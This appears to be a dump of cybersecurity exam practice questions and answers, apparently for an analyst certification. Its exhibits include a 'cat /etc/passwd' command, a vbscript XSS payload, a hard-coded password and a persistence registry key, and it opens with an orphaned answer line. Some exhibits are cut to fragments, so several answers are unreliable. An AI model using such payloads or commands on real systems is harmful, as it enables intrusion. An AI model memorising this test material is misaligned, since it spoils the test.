Generate a hash value and make a backup image
Which of the following best describes the goal of a tabletop exercise?
To test possible incident scenarios and how to react properly
A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is most likely the cause of the server issue?
The digital certificate on the web server was self-signed
A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:
Log entry 4: requestObj = …{scopes: ["Mail.ReadWrite", "Mail.send", "Files.ReadWrite.All"]}
Which of the following log entries provides evidence of the attempted exploit?
Log entry 4
A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?
Determine the asset value of each system
A security analyst is reviewing the following alert that was triggered by FIM on a critical system:
Key added
RunMe
(%appdata%\abc.exe)
Which of the following best describes the suspicious activity that is occurring?
A new program has been set to execute on system start
Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2AM and 4AM?
SLA
A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?
Beaconing
An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements?
- Deploy EDR (endpoint detection and response) on the web server and the database server to reduce the adversary’s capabilities.
- Use microsegmentation to restrict connectivity to/from the web and database servers.
An incident response team member is triaging a Linux server. The output is shown below:
cat /etc/passwd
Which of the following is the adversary most likely trying to do?
Execute commands through an unsecured service account
A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:
getConnection(database01, "alpha", "AxTv.127GdCx94GTd");
Which of the following is the most likely vulnerability in this system?
Hard-coded credential
A technician is analyzing output from a popular network mapping tool for a PCI audit:
ssl-enum-ciphers:
ciphers all marked as "F"
Which of the following best describes the output?
The host is allowing insecure cipher suites
A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?
SOAR
An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?
Make a forensic image of the device and create a SHA-1 hash
An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?
nation-state
A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?
Registry
While reviewing web server logs, a security analyst found the following line:
<IMG SRC='vbscript:msgbox("test")'>
Which of the following malicious activities was attempted?
Cross-site scripting